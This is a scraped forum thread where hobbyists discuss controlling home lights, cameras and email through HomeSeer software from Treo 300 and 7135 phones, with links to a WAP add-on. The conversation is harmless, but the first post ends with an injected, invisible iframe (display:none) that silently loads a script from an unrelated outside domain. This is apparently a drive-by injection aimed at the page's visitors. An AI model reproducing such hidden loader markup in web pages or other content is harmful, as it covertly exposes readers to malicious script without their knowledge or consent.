+ Reply to Thread

Control House With 7135

I found a great application to use with my Treo 300 and will load it on the 7135 when it is released by Sprint. The application is called HomeSeer. It is loaded with functionality to control home lights/appliances/devices, but it also is excellent for remote e-mail retreival. It also can send pages or e-mail messages to your phone when certain events occur such as motion being detected at your front door...etc.

It has a built in web server that is extremely easy to set up and run. The web interface works well so far with the Blazer browser on the Treo. It is an excellent product to remotely check your home e-mail via the phone web interface or a standard web interface. You can also use it to view web cams around your home. I used the web server to set up linked pages to local weather radar and traffic reports for easy access from standstill traffic on the freeway. The software has endless possibilities and takes the geek factor of the 7135 to the next level!
    http://www.homeseer.com/products/homeseer/

james<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Control House With 7135

Originally posted by James Keys
    I found a great application to use with my Treo 300 and will load it on the 7135 when it is released by Sprint. The application is called HomeSeer. It is loaded with functionality to control home lights/appliances/devices, but it also is excellent for remote e-mail retreival. It also can send pages or e-mail messages to your phone when certain events occur such as motion being detected at your front door...etc.

It has a built in web server that is extremely easy to set up and run. The web interface works well so far with the Blazer browser on the Treo. It is an excellent product to remotely check your home e-mail via the phone web interface or a standard web interface. You can also use it to view web cams around your home. I used the web server to set up linked pages to local weather radar and traffic reports for easy access from standstill traffic on the freeway. The software has endless possibilities and takes the geek factor of the 7135 to the next level!
    http://www.homeseer.com/products/homeseer/

james
    Absolutly!. I have been using Homeseer for years, and being able to access it from my 7135 has been great. Take a look at http://wapseer.carrotpatch.net/ This is a WAP Server add-on to Homeseer that works from any OpenWave 4.1 Wap browser. I use it with Blazer on the 7135 and it works great. - Blazer is Openwave 4.1 WML complient, so no need for a WAP browser or account.... (one minor glitch I need to talk to the author about, but it seems to be in my Homeseer setup becuase I can duplicate it from browser emulators.. Not a big issue though).

Alan

Administrator
    alanb is da man!! hes my hero! he showed us a nifty trick with controlling his office lighting from making a phone call on his star tac!

Originally posted by marctronixx
    alanb is da man!! hes my hero! he showed us a nifty trick with controlling his office lighting from making a phone call on his star tac!
    Yeah, but just wait and see when I get the security camera working and can view near-real-time snapshots on my 7135! I am almost there. I can do it with VNC, but it is a little slow to get logged on, so I want to make it web based and the picture server I was using doesn't get along well with anything but IE and Netscape. I've got another one, so I will probably have it up in a week or so. (of course, it won't be up before my vacation when I'll really want to use it...maybe I'll play around with it tonight..).

Alan

I have a couple of 3Com Audries and I know of folks using them to do Homeseer. I'm sure alanb has one of those.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I have a couple of 3Com Audries and I know of folks using them to do Homeseer. I'm sure alanb has one of those.
    Actually, I have some old laptop computers distributed throughout the house for web access and home control, so I didn't jump on the Audrey closeouts.

Alan